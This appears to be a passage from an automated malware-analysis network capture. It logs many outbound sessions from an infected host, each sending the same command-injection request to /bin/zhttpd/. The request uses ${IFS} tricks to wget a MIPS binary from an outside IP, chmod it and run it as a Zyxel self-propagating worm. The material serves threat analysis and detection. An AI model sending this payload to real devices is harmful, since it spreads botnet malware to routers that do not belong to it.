                                                Jan 12, 2024 18:24:38.932710886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5104192.168.2.135952893.225.139.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.932739019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5105192.168.2.135015219.206.29.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.932796955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5106192.168.2.1359328151.157.114.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.932864904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5107192.168.2.1354488205.163.50.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.932939053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5108192.168.2.134373694.78.112.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.932979107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5109192.168.2.1337910174.160.131.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.933022976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5110192.168.2.135181873.126.221.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.933075905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5111192.168.2.1359912208.56.74.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.933109999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5112192.168.2.1345144170.21.231.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.933165073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5113192.168.2.133825684.91.72.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.933195114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5114192.168.2.1345602223.41.12.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.933237076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5115192.168.2.1333144221.37.141.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.933315039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5116192.168.2.13549248.24.177.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.933372974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5117192.168.2.1356928120.191.135.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.933423996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5118192.168.2.134125863.37.177.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.933482885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5119192.168.2.1347874154.39.168.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.933532000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5120192.168.2.135032482.182.124.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.933602095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5121192.168.2.1356070213.234.231.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.933621883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5122192.168.2.1351494120.180.186.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.933676004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5123192.168.2.134560046.178.71.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.933722973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5124192.168.2.1353542141.35.69.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.933785915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5125192.168.2.135246261.202.77.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.933840990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5126192.168.2.1335974211.67.16.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.933901072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5127192.168.2.1344232130.36.247.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.933945894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5128192.168.2.135667468.147.168.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.933996916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5129192.168.2.1346494189.23.57.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.934071064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5130192.168.2.1357948203.27.38.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.934149027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5131192.168.2.1353054175.129.86.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.934175968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5132192.168.2.133972284.51.244.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.934226990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5133192.168.2.1347304102.111.69.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.934281111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5134192.168.2.134566427.181.208.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.934328079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5135192.168.2.1336610205.197.219.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.934380054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5136192.168.2.134296285.25.234.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.934468985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5137192.168.2.1355434208.22.207.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.934497118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5138192.168.2.134688861.149.17.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.934566975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5139192.168.2.1360726103.189.211.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.934628963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5140192.168.2.1350574145.185.47.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.934703112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5141192.168.2.1348484149.192.45.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.934721947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5142192.168.2.1347846193.142.13.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.934777021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5143192.168.2.135462039.76.65.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.934839964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5144192.168.2.1337122156.169.246.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.934886932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5145192.168.2.135508844.47.19.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.934945107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5146192.168.2.134367877.37.67.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.935010910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5147192.168.2.1349550210.181.118.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.935076952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5148192.168.2.1346356132.188.160.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.935153961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5149192.168.2.1336826160.39.236.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.935179949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5150192.168.2.1360370175.196.190.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.935261965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5151192.168.2.134968217.164.156.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.935317039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5152192.168.2.1357546123.152.74.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.935376883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5153192.168.2.1344028195.83.19.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.935425043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5154192.168.2.133456627.248.91.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.935496092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5155192.168.2.1357118197.2.148.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.935544968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5156192.168.2.1349506204.52.108.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.935585976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5157192.168.2.135185284.222.58.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.935652018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5158192.168.2.13548789.172.155.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.935714960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5159192.168.2.134082260.118.177.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.935766935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5160192.168.2.135964813.196.249.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.935825109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5161192.168.2.1336182162.241.98.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.935879946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5162192.168.2.1349028176.167.143.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.935918093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5163192.168.2.1353764162.246.70.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.935950994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5164192.168.2.1353668128.58.237.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.936023951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5165192.168.2.1346408114.207.187.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.936088085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5166192.168.2.134717481.247.70.148443
                                                TimestampBytes transferredDirectionData
